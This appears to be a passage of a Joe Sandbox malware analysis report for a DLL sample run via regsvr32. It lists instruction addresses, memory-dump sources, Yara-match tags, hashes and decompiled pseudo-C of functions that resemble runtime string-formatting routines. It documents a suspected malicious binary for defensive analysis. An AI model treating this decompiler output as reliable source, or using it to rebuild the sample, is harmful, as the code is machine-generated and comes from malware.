                                                                                                    0x18001fdf3
                                                                                                    0x18001fdf8
                                                                                                    0x18001fdfd
                                                                                                    0x18001fe05
                                                                                                    0x18001fe0a
                                                                                                    0x18001fe0f
                                                                                                    0x18001fe14
                                                                                                    0x18001fe19
                                                                                                    0x18001fe1e
                                                                                                    0x18001fe23
                                                                                                    0x18001fe28
                                                                                                    0x18001fe2d
                                                                                                    0x18001fe2f
                                                                                                    0x18001fe34
                                                                                                    0x18001fe36
                                                                                                    0x18001fe3d
                                                                                                    0x18001fe44
                                                                                                    0x18001fe4c
                                                                                                    0x18001fe4e
                                                                                                    0x18001fe59
                                                                                                    0x18001fe5b
                                                                                                    0x18001fe5f
                                                                                                    0x18001fe6a
                                                                                                    0x18001fe6c
                                                                                                    0x18001fe71
                                                                                                    0x18001fe73
                                                                                                    0x18001fe7c
                                                                                                    0x18001fe7f
                                                                                                    0x18001fe84
                                                                                                    0x18001fe8d
                                                                                                    0x18001fe91
                                                                                                    0x18001fe9a
                                                                                                    0x18001fea0
                                                                                                    0x18001fea5
                                                                                                    0x18001feab
                                                                                                    0x18001feb5
                                                                                                    0x18001feb5
                                                                                                    0x18001febc
                                                                                                    0x18001fec6
                                                                                                    0x18001fec8
                                                                                                    0x18001fecb
                                                                                                    0x18001fed0
                                                                                                    0x18001fed5
                                                                                                    0x18001fedc
                                                                                                    0x18001fee5
                                                                                                    0x18001fee7
                                                                                                    0x18001feed
                                                                                                    0x18001fef0
                                                                                                    0x18001fef4
                                                                                                    0x18001ff04
                                                                                                    0x18001ff0e
                                                                                                    0x18001ff10
                                                                                                    0x18001ff13
                                                                                                    0x18001ff15
                                                                                                    0x18001ff1b
                                                                                                    0x18001ff2e
                                                                                                    0x18001ff32
                                                                                                    0x18001ff34
                                                                                                    0x18001ff40
                                                                                                    0x18001ff45
                                                                                                    0x18001ff49
                                                                                                    0x18001ff50
                                                                                                    0x18001ff5b
                                                                                                    0x18001ff69
                                                                                                    0x18001ff6e
                                                                                                    0x18001ff74
                                                                                                    0x18001ff81
                                                                                                    0x18001ff8a
                                                                                                    0x18001ff95
                                                                                                    0x18001ff9d
                                                                                                    0x18001ffa5
                                                                                                    0x18001ffa8
                                                                                                    0x18001ffad
                                                                                                    0x18001ffb8
                                                                                                    0x18001ffc0
                                                                                                    0x18001ffc5
                                                                                                    0x18001ffce
                                                                                                    0x18001ffd8
                                                                                                    0x18001ffe1
                                                                                                    0x18001ffec
                                                                                                    0x18001fff1
                                                                                                    0x18001fffa
                                                                                                    0x18002002c

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                    • Opcode ID: 56c1321afb23aec1566c1ebcbd552dabb598dc953a4e0c37e3fec3edbc0a75cb
                                                                                                    • Instruction ID: 77a1ac390d1ccfc9bf56662cf0e6da581297fa11f555924e56363698cad3a8bd
                                                                                                    • Opcode Fuzzy Hash: 56c1321afb23aec1566c1ebcbd552dabb598dc953a4e0c37e3fec3edbc0a75cb
                                                                                                    • Instruction Fuzzy Hash: 9381F232310A4886EBFA9A2590407FE23E1E74DBC8F549515FE05877AACF36CA4ED741
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02616A0C Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: -s}$
                                                                                                    • API String ID: 0-2201591196
                                                                                                    • Opcode ID: 89d1b10883c03688696bea83f0a76cd2a7059d4846c4711173aa8146f4ceba51
                                                                                                    • Instruction ID: b6b1f2c1065e719bae41b67c8a7e0e1c6fc604fe1f903c9b98e61aa4c54a74cb
                                                                                                    • Opcode Fuzzy Hash: 89d1b10883c03688696bea83f0a76cd2a7059d4846c4711173aa8146f4ceba51
                                                                                                    • Instruction Fuzzy Hash: 5CC177B190070D8FDB58CF68C44A5DE7BB9FB55308F404029EC1E9A2A0D7B4F519CB56
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02628368 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %P1A
                                                                                                    • API String ID: 0-496162836
                                                                                                    • Opcode ID: e231f685d70d3155e60e9ab4212b7a829c559986216767b704e1eefc3ab2efec
                                                                                                    • Instruction ID: b86a691b314b18d73e545ce43925042f65182df8d35d5b735ff7b502569c651d
                                                                                                    • Opcode Fuzzy Hash: e231f685d70d3155e60e9ab4212b7a829c559986216767b704e1eefc3ab2efec
                                                                                                    • Instruction Fuzzy Hash: 3FB1B4B0558788CBEBBEDF34CC896D93BA9FB44704F504259E80E8E2A0DB74574ACB45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001F2AC Relevance: 1.5, Strings: 1, Instructions: 203COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 55%
                                                                                                    			E0000000118001F2AC(intOrPtr* __rax, long long __rbx, signed short* __rcx, long long __rsi, long long __rbp, char _a8, char _a10, long long _a16, long long _a24, long long _a32) {
				long long _v40;
				void* __rdi;
				char _t68;
				void* _t70;
				unsigned int _t106;
				intOrPtr _t107;
				unsigned int _t108;
				signed char _t115;
				void* _t120;
				void* _t124;
				void* _t125;
				void* _t126;
				intOrPtr* _t165;
				signed short* _t168;
				signed short* _t170;
				signed short* _t171;
				void* _t177;
				void* _t179;
				intOrPtr* _t185;
				void* _t187;
				void* _t188;
				void* _t194;
				void* _t196;

				_t184 = __rbp;
				_t182 = __rsi;
				_t170 = __rcx;
				_t165 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t188 = _t187 - 0x30;
				_t68 =  *((char*)(__rcx + 0x41));
				_t168 = __rcx;
				r15d = 1;
				_t126 = _t68 - 0x64;
				if (_t126 > 0) goto 0x8001f333;
				if (_t126 == 0) goto 0x8001f3a4;
				if (_t68 == 0x41) goto 0x8001f3b7;
				if (_t68 == 0x43) goto 0x8001f31d;
				if (_t68 - 0x44 <= 0) goto 0x8001f3c0;
				if (_t68 - 0x47 <= 0) goto 0x8001f3b7;
				if (_t68 == 0x53) goto 0x8001f360;
				if (_t68 == 0x58) goto 0x8001f375;
				if (_t68 == 0x5a) goto 0x8001f329;
				if (_t68 == 0x61) goto 0x8001f3b7;
				if (_t68 != 0x63) goto 0x8001f3c0;
				E000000011800231E0(_t68 - 0x63, __rcx, __rcx, __rsi);
				goto 0x8001f3bc;
				_t70 = E00000001180020F18(_t168, _t170, _t182);
				goto 0x8001f3bc;
				if (_t70 - 0x67 <= 0) goto 0x8001f3b7;
				if (_t70 == 0x69) goto 0x8001f3a4;
				if (_t70 == 0x6e) goto 0x8001f39d;
				if (_t70 == 0x6f) goto 0x8001f37f;
				if (_t70 == 0x70) goto 0x8001f367;
				if (_t70 == 0x73) goto 0x8001f360;
				if (_t70 == 0x75) goto 0x8001f3a8;
				if (_t70 != 0x78) goto 0x8001f3c0;
				goto 0x8001f3ad;
				E00000001180025D7C(_t168, _t170, _t182);
				goto 0x8001f3bc;
				 *((intOrPtr*)(_t170 + 0x38)) = 0x10;
				 *((intOrPtr*)(_t170 + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x8001f3b0;
				_t106 =  *(_t170 + 0x30);
				if ((r15b & _t106 >> 0x00000005) == 0) goto 0x8001f393;
				asm("bts ecx, 0x7");
				 *(_t168 + 0x30) = _t106;
				_t171 = _t168;
				goto 0x8001f3ad;
				E0000000118002512C(_t165, _t168, _t171);
				goto 0x8001f3bc;
				 *(_t171 + 0x30) =  *(_t171 + 0x30) | 0x00000010;
				r8d = 0;
				E00000001180023F68(0xa, _t168, _t171, _t177, _t182, __rbp, _t194);
				goto 0x8001f3bc;
				if (E00000001180021C14(0xa, _t120, _t165, _t168, _t171, _t182, _t184) != 0) goto 0x8001f3c7;
				goto 0x8001f522;
				if ( *((intOrPtr*)(_t168 + 0x47c)) != 2) goto 0x8001f3dd;
				if ( *((intOrPtr*)(_t168 + 0x478)) == r15d) goto 0x8001f51f;
				if ( *((char*)(_t168 + 0x40)) != 0) goto 0x8001f51f;
				_t115 =  *(_t168 + 0x30);
				_a8 = 0;
				_a10 = 0;
				if ((r15b & 0) == 0) goto 0x8001f42f;
				if ((r15b & 0) == 0) goto 0x8001f412;
				_a8 = 0x2d;
				goto 0x8001f42c;
				if ((r15b & _t115) == 0) goto 0x8001f41e;
				_a8 = 0x2b;
				goto 0x8001f42c;
				if ((r15b & 0) == 0) goto 0x8001f42f;
				_a8 = 0x20;
				_t179 = _t196;
				_t107 =  *((intOrPtr*)(_t168 + 0x41));
				if (0 != 0) goto 0x8001f448;
				if ((r15b & 0) == 0) goto 0x8001f448;
				r8b = r15b;
				goto 0x8001f44b;
				r8b = 0;
				if (r8b != 0) goto 0x8001f45c;
				if (0 == 0) goto 0x8001f486;
				 *((char*)(_t188 + _t179 + 0x50)) = 0x30;
				if (_t107 == 0x58) goto 0x8001f472;
				if (_t107 == 0x41) goto 0x8001f472;
				goto 0x8001f475;
				asm("sbb al, al");
				 *((char*)(_t188 + _t179 + _t196 + 0x50)) = ( ~r15b & 0x000000e0) + 0x78;
				_t124 =  *((intOrPtr*)(_t168 + 0x34)) -  *((intOrPtr*)(_t168 + 0x50));
				if ((_t115 & 0x0000000c) != 0) goto 0x8001f4a8;
				r8d = _t124;
				E00000001180017780(( ~r15b & 0x000000e0) + 0x78, 0x20, _t168, _t168 + 0x468, _t168 + 0x28);
				_t185 = _t168 + 0x28;
				_v40 =  *((intOrPtr*)(_t168 + 0x10));
				r8d = 0;
				E00000001180028A60(_t124, _t125, _t168, _t168 + 0x468, _t179 + _t196 + _t196, _t182, _t185, _t185);
				_t108 =  *(_t168 + 0x30);
				if ((r15b & _t108 >> 0x00000003) == 0) goto 0x8001f4f4;
				if ((r15b & _t108 >> 0x00000002) != 0) goto 0x8001f4f4;
				r8d = _t124;
				E00000001180017780(_t108 >> 3, 0x30, _t168, _t168 + 0x468, _t185);
				E00000001180028118(_t168, _t168, _t182);
				if ( *_t185 < 0) goto 0x8001f51f;
				if ((r15b &  *(_t168 + 0x30) >> 0x00000002) == 0) goto 0x8001f51f;
				r8d = _t124;
				E00000001180017780( *(_t168 + 0x30) >> 2, 0x20, _t168, _t168 + 0x468, _t185);
				return r15b;
			}


























                                                                                                    0x18001f2ac
                                                                                                    0x18001f2ac
                                                                                                    0x18001f2ac
                                                                                                    0x18001f2ac
                                                                                                    0x18001f2ac
                                                                                                    0x18001f2b1
                                                                                                    0x18001f2b6
                                                                                                    0x18001f2c0
                                                                                                    0x18001f2c4
                                                                                                    0x18001f2c8
                                                                                                    0x18001f2cb
                                                                                                    0x18001f2d1
                                                                                                    0x18001f2d4
                                                                                                    0x18001f2d6
                                                                                                    0x18001f2df
                                                                                                    0x18001f2e8
                                                                                                    0x18001f2ed
                                                                                                    0x18001f2f6
                                                                                                    0x18001f2ff
                                                                                                    0x18001f304
                                                                                                    0x18001f309
                                                                                                    0x18001f30e
                                                                                                    0x18001f317
                                                                                                    0x18001f31f
                                                                                                    0x18001f324
                                                                                                    0x18001f329
                                                                                                    0x18001f32e
                                                                                                    0x18001f336
                                                                                                    0x18001f33b
                                                                                                    0x18001f340
                                                                                                    0x18001f345
                                                                                                    0x18001f34a
                                                                                                    0x18001f34f
                                                                                                    0x18001f354
                                                                                                    0x18001f359
                                                                                                    0x18001f35e
                                                                                                    0x18001f360
                                                                                                    0x18001f365
                                                                                                    0x18001f367
                                                                                                    0x18001f36e
                                                                                                    0x18001f375
                                                                                                    0x18001f37d
                                                                                                    0x18001f37f
                                                                                                    0x18001f38a
                                                                                                    0x18001f38c
                                                                                                    0x18001f390
                                                                                                    0x18001f398
                                                                                                    0x18001f39b
                                                                                                    0x18001f39d
                                                                                                    0x18001f3a2
                                                                                                    0x18001f3a4
                                                                                                    0x18001f3ad
                                                                                                    0x18001f3b0
                                                                                                    0x18001f3b5
                                                                                                    0x18001f3be
                                                                                                    0x18001f3c2
                                                                                                    0x18001f3ce
                                                                                                    0x18001f3d7
                                                                                                    0x18001f3e1
                                                                                                    0x18001f3e7
                                                                                                    0x18001f3ec
                                                                                                    0x18001f3f3
                                                                                                    0x18001f3ff
                                                                                                    0x18001f409
                                                                                                    0x18001f40b
                                                                                                    0x18001f410
                                                                                                    0x18001f415
                                                                                                    0x18001f417
                                                                                                    0x18001f41c
                                                                                                    0x18001f425
                                                                                                    0x18001f427
                                                                                                    0x18001f42c
                                                                                                    0x18001f42f
                                                                                                    0x18001f437
                                                                                                    0x18001f441
                                                                                                    0x18001f443
                                                                                                    0x18001f446
                                                                                                    0x18001f448
                                                                                                    0x18001f456
                                                                                                    0x18001f45a
                                                                                                    0x18001f45c
                                                                                                    0x18001f467
                                                                                                    0x18001f46c
                                                                                                    0x18001f470
                                                                                                    0x18001f477
                                                                                                    0x18001f47f
                                                                                                    0x18001f48c
                                                                                                    0x18001f491
                                                                                                    0x18001f497
                                                                                                    0x18001f4a3
                                                                                                    0x18001f4ac
                                                                                                    0x18001f4b7
                                                                                                    0x18001f4c7
                                                                                                    0x18001f4ca
                                                                                                    0x18001f4cf
                                                                                                    0x18001f4da
                                                                                                    0x18001f4e2
                                                                                                    0x18001f4e7
                                                                                                    0x18001f4ef
                                                                                                    0x18001f4f9
                                                                                                    0x18001f502
                                                                                                    0x18001f50d
                                                                                                    0x18001f512
                                                                                                    0x18001f51a
                                                                                                    0x18001f53a

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 0-4108050209
                                                                                                    • Opcode ID: cec7f476f80673810d6e45dadefdc62a586f3807bb51692e857e7e5c94f0457d
                                                                                                    • Instruction ID: e7fde64b81199e11e2a66af11357a5d11b48f3bd1309d48e9aa21cf72f4c1756
                                                                                                    • Opcode Fuzzy Hash: cec7f476f80673810d6e45dadefdc62a586f3807bb51692e857e7e5c94f0457d
                                                                                                    • Instruction Fuzzy Hash: DD71B232204E8886FBFB8A2990453FE6391A3497C8F189515FE459B7DACF25CB4E8741
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001EB24 Relevance: 1.5, Strings: 1, Instructions: 203COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 50%
                                                                                                    			E0000000118001EB24(intOrPtr* __rax, long long __rbx, signed short* __rcx, void* __rdx, long long __rsi, long long __rbp, char _a8, char _a10, long long _a16, long long _a24, long long _a32) {
				long long _v40;
				void* __rdi;
				char _t68;
				void* _t70;
				unsigned int _t106;
				intOrPtr _t107;
				unsigned int _t108;
				signed char _t115;
				void* _t120;
				void* _t124;
				void* _t125;
				intOrPtr* _t164;
				signed short* _t167;
				signed short* _t169;
				signed short* _t170;
				void* _t176;
				void* _t178;
				intOrPtr* _t184;
				void* _t186;
				void* _t187;
				void* _t193;
				void* _t195;

				_t183 = __rbp;
				_t181 = __rsi;
				_t176 = __rdx;
				_t169 = __rcx;
				_t164 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t187 = _t186 - 0x30;
				_t68 =  *((char*)(__rcx + 0x41));
				_t167 = __rcx;
				r15d = 1;
				_t125 = _t68 - 0x64;
				if (_t125 > 0) goto 0x8001ebab;
				if (_t125 == 0) goto 0x8001ec1c;
				if (_t68 == 0x41) goto 0x8001ec2f;
				if (_t68 == 0x43) goto 0x8001eb95;
				if (_t68 - 0x44 <= 0) goto 0x8001ec38;
				if (_t68 - 0x47 <= 0) goto 0x8001ec2f;
				if (_t68 == 0x53) goto 0x8001ebd8;
				if (_t68 == 0x58) goto 0x8001ebed;
				if (_t68 == 0x5a) goto 0x8001eba1;
				if (_t68 == 0x61) goto 0x8001ec2f;
				if (_t68 != 0x63) goto 0x8001ec38;
				E00000001180022F80(_t68 - 0x63, __rcx, __rcx, __rsi);
				goto 0x8001ec34;
				_t70 = E00000001180020D7C(_t167, _t169, _t181);
				goto 0x8001ec34;
				if (_t70 - 0x67 <= 0) goto 0x8001ec2f;
				if (_t70 == 0x69) goto 0x8001ec1c;
				if (_t70 == 0x6e) goto 0x8001ec15;
				if (_t70 == 0x6f) goto 0x8001ebf7;
				if (_t70 == 0x70) goto 0x8001ebdf;
				if (_t70 == 0x73) goto 0x8001ebd8;
				if (_t70 == 0x75) goto 0x8001ec20;
				if (_t70 != 0x78) goto 0x8001ec38;
				goto 0x8001ec25;
				E00000001180025BB4(_t167, _t169, _t181);
				goto 0x8001ec34;
				 *((intOrPtr*)(_t169 + 0x38)) = 0x10;
				 *((intOrPtr*)(_t169 + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x8001ec28;
				_t106 =  *(_t169 + 0x30);
				if ((r15b & _t106 >> 0x00000005) == 0) goto 0x8001ec0b;
				asm("bts ecx, 0x7");
				 *(_t167 + 0x30) = _t106;
				_t170 = _t167;
				goto 0x8001ec25;
				E00000001180024E70(_t164, _t167, _t170);
				goto 0x8001ec34;
				 *(_t170 + 0x30) =  *(_t170 + 0x30) | 0x00000010;
				r8d = 0;
				E00000001180023A24(0xa, _t167, _t170, _t176, _t181, __rbp, _t193);
				goto 0x8001ec34;
				if (E00000001180021590(0xa, _t120, _t164, _t167, _t170, _t181, _t183) != 0) goto 0x8001ec3f;
				goto 0x8001ed9a;
				if ( *((intOrPtr*)(_t167 + 0x47c)) != 2) goto 0x8001ec55;
				if ( *((intOrPtr*)(_t167 + 0x478)) == r15d) goto 0x8001ed97;
				if ( *((char*)(_t167 + 0x40)) != 0) goto 0x8001ed97;
				_t115 =  *(_t167 + 0x30);
				_a8 = 0;
				_a10 = 0;
				if ((r15b & 0) == 0) goto 0x8001eca7;
				if ((r15b & 0) == 0) goto 0x8001ec8a;
				_a8 = 0x2d;
				goto 0x8001eca4;
				if ((r15b & _t115) == 0) goto 0x8001ec96;
				_a8 = 0x2b;
				goto 0x8001eca4;
				if ((r15b & 0) == 0) goto 0x8001eca7;
				_a8 = 0x20;
				_t178 = _t195;
				_t107 =  *((intOrPtr*)(_t167 + 0x41));
				if (0 != 0) goto 0x8001ecc0;
				if ((r15b & 0) == 0) goto 0x8001ecc0;
				r8b = r15b;
				goto 0x8001ecc3;
				r8b = 0;
				if (r8b != 0) goto 0x8001ecd4;
				if (0 == 0) goto 0x8001ecfe;
				 *((char*)(_t187 + _t178 + 0x50)) = 0x30;
				if (_t107 == 0x58) goto 0x8001ecea;
				if (_t107 == 0x41) goto 0x8001ecea;
				goto 0x8001eced;
				asm("sbb al, al");
				 *((char*)(_t187 + _t178 + _t195 + 0x50)) = ( ~r15b & 0x000000e0) + 0x78;
				_t124 =  *((intOrPtr*)(_t167 + 0x34)) -  *((intOrPtr*)(_t167 + 0x50));
				if ((_t115 & 0x0000000c) != 0) goto 0x8001ed20;
				r8d = _t124;
				E0000000118001766C(0x20, _t167, _t167 + 0x468, _t178 + _t195 + _t195, _t181, _t183, _t167 + 0x28);
				_t184 = _t167 + 0x28;
				_v40 =  *((intOrPtr*)(_t167 + 0x10));
				r8d = 0;
				E0000000118002885C(_t167, _t167 + 0x468,  &_a8, _t181, _t184, _t184);
				_t108 =  *(_t167 + 0x30);
				if ((r15b & _t108 >> 0x00000003) == 0) goto 0x8001ed6c;
				if ((r15b & _t108 >> 0x00000002) != 0) goto 0x8001ed6c;
				r8d = _t124;
				E0000000118001766C(0x30, _t167, _t167 + 0x468, _t178 + _t195 + _t195, _t181, _t184, _t184);
				E00000001180027E90(_t167, _t167, _t181);
				if ( *_t184 < 0) goto 0x8001ed97;
				if ((r15b &  *(_t167 + 0x30) >> 0x00000002) == 0) goto 0x8001ed97;
				r8d = _t124;
				E0000000118001766C(0x20, _t167, _t167 + 0x468, _t178 + _t195 + _t195, _t181, _t184, _t184);
				return r15b;
			}

























                                                                                                    0x18001eb24
                                                                                                    0x18001eb24
                                                                                                    0x18001eb24
                                                                                                    0x18001eb24
                                                                                                    0x18001eb24
                                                                                                    0x18001eb24
                                                                                                    0x18001eb29
                                                                                                    0x18001eb2e
                                                                                                    0x18001eb38
                                                                                                    0x18001eb3c
                                                                                                    0x18001eb40
                                                                                                    0x18001eb43
                                                                                                    0x18001eb49
                                                                                                    0x18001eb4c
                                                                                                    0x18001eb4e
                                                                                                    0x18001eb57
                                                                                                    0x18001eb60
                                                                                                    0x18001eb65
                                                                                                    0x18001eb6e
                                                                                                    0x18001eb77
                                                                                                    0x18001eb7c
                                                                                                    0x18001eb81
                                                                                                    0x18001eb86
                                                                                                    0x18001eb8f
                                                                                                    0x18001eb97
                                                                                                    0x18001eb9c
                                                                                                    0x18001eba1
                                                                                                    0x18001eba6
                                                                                                    0x18001ebae
                                                                                                    0x18001ebb3
                                                                                                    0x18001ebb8
                                                                                                    0x18001ebbd
                                                                                                    0x18001ebc2
                                                                                                    0x18001ebc7
                                                                                                    0x18001ebcc
                                                                                                    0x18001ebd1
                                                                                                    0x18001ebd6
                                                                                                    0x18001ebd8
                                                                                                    0x18001ebdd
                                                                                                    0x18001ebdf
                                                                                                    0x18001ebe6
                                                                                                    0x18001ebed
                                                                                                    0x18001ebf5
                                                                                                    0x18001ebf7
                                                                                                    0x18001ec02
                                                                                                    0x18001ec04
                                                                                                    0x18001ec08
                                                                                                    0x18001ec10
                                                                                                    0x18001ec13
                                                                                                    0x18001ec15
                                                                                                    0x18001ec1a
                                                                                                    0x18001ec1c
                                                                                                    0x18001ec25
                                                                                                    0x18001ec28
                                                                                                    0x18001ec2d
                                                                                                    0x18001ec36
                                                                                                    0x18001ec3a
                                                                                                    0x18001ec46
                                                                                                    0x18001ec4f
                                                                                                    0x18001ec59
                                                                                                    0x18001ec5f
                                                                                                    0x18001ec64
                                                                                                    0x18001ec6b
                                                                                                    0x18001ec77
                                                                                                    0x18001ec81
                                                                                                    0x18001ec83
                                                                                                    0x18001ec88
                                                                                                    0x18001ec8d
                                                                                                    0x18001ec8f
                                                                                                    0x18001ec94
                                                                                                    0x18001ec9d
                                                                                                    0x18001ec9f
                                                                                                    0x18001eca4
                                                                                                    0x18001eca7
                                                                                                    0x18001ecaf
                                                                                                    0x18001ecb9
                                                                                                    0x18001ecbb
                                                                                                    0x18001ecbe
                                                                                                    0x18001ecc0
                                                                                                    0x18001ecce
                                                                                                    0x18001ecd2
                                                                                                    0x18001ecd4
                                                                                                    0x18001ecdf
                                                                                                    0x18001ece4
                                                                                                    0x18001ece8
                                                                                                    0x18001ecef
                                                                                                    0x18001ecf7
                                                                                                    0x18001ed04
                                                                                                    0x18001ed09
                                                                                                    0x18001ed0f
                                                                                                    0x18001ed1b
                                                                                                    0x18001ed24
                                                                                                    0x18001ed2f
                                                                                                    0x18001ed3f
                                                                                                    0x18001ed42
                                                                                                    0x18001ed47
                                                                                                    0x18001ed52
                                                                                                    0x18001ed5a
                                                                                                    0x18001ed5f
                                                                                                    0x18001ed67
                                                                                                    0x18001ed71
                                                                                                    0x18001ed7a
                                                                                                    0x18001ed85
                                                                                                    0x18001ed8a
                                                                                                    0x18001ed92
                                                                                                    0x18001edb2

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 0-4108050209
                                                                                                    • Opcode ID: 5c2949bcd0349573727c0a31fe1d5f2bc1495c8092b42bf526ddd0247cf27f6f
                                                                                                    • Instruction ID: 95d57cb47a9d811f8c68b6b6e93ad30ac79558465feb54be3d4da417b116c260
                                                                                                    • Opcode Fuzzy Hash: 5c2949bcd0349573727c0a31fe1d5f2bc1495c8092b42bf526ddd0247cf27f6f
                                                                                                    • Instruction Fuzzy Hash: 4F71C631204ECD46FBEA8A2958407DE6791A34FBC8F14C917FE4587696CF25CA4F8781
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001F030 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODECrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 63%
                                                                                                    			E0000000118001F030(void* __rax, long long __rbx, long long __rcx, long long __rsi, long long __rbp, char _a8, char _a10, long long _a16, long long _a24, long long _a32) {
				long long _v40;
				void* __rdi;
				char _t66;
				void* _t68;
				unsigned int _t104;
				intOrPtr _t105;
				unsigned int _t106;
				signed char _t113;
				void* _t118;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t161;
				void* _t173;
				void* _t175;
				intOrPtr* _t181;
				void* _t183;
				void* _t184;
				void* _t186;
				void* _t191;
				void* _t193;

				_t178 = __rsi;
				_t161 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t184 = _t183 - 0x30;
				_t66 =  *((char*)(__rcx + 0x41));
				r15d = 1;
				_t124 = _t66 - 0x64;
				if (_t124 > 0) goto 0x8001f0b7;
				if (_t124 == 0) goto 0x8001f128;
				if (_t66 == 0x41) goto 0x8001f13b;
				if (_t66 == 0x43) goto 0x8001f0a1;
				if (_t66 - 0x44 <= 0) goto 0x8001f144;
				if (_t66 - 0x47 <= 0) goto 0x8001f13b;
				if (_t66 == 0x53) goto 0x8001f0e4;
				if (_t66 == 0x58) goto 0x8001f0f9;
				if (_t66 == 0x5a) goto 0x8001f0ad;
				if (_t66 == 0x61) goto 0x8001f13b;
				if (_t66 != 0x63) goto 0x8001f144;
				E0000000118002312C(_t66 - 0x63, __rcx, __rcx);
				goto 0x8001f140;
				_t68 = E00000001180020E98(__rcx, __rcx, __rsi);
				goto 0x8001f140;
				if (_t68 - 0x67 <= 0) goto 0x8001f13b;
				if (_t68 == 0x69) goto 0x8001f128;
				if (_t68 == 0x6e) goto 0x8001f121;
				if (_t68 == 0x6f) goto 0x8001f103;
				if (_t68 == 0x70) goto 0x8001f0eb;
				if (_t68 == 0x73) goto 0x8001f0e4;
				if (_t68 == 0x75) goto 0x8001f12c;
				if (_t68 != 0x78) goto 0x8001f144;
				goto 0x8001f131;
				E00000001180025CEC(__rcx, __rcx, _t178);
				goto 0x8001f140;
				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x8001f134;
				_t104 =  *(__rcx + 0x30);
				if ((r15b & _t104 >> 0x00000005) == 0) goto 0x8001f117;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x30) = _t104;
				goto 0x8001f131;
				E00000001180025050(__rcx, __rcx, _t173, _t178);
				goto 0x8001f140;
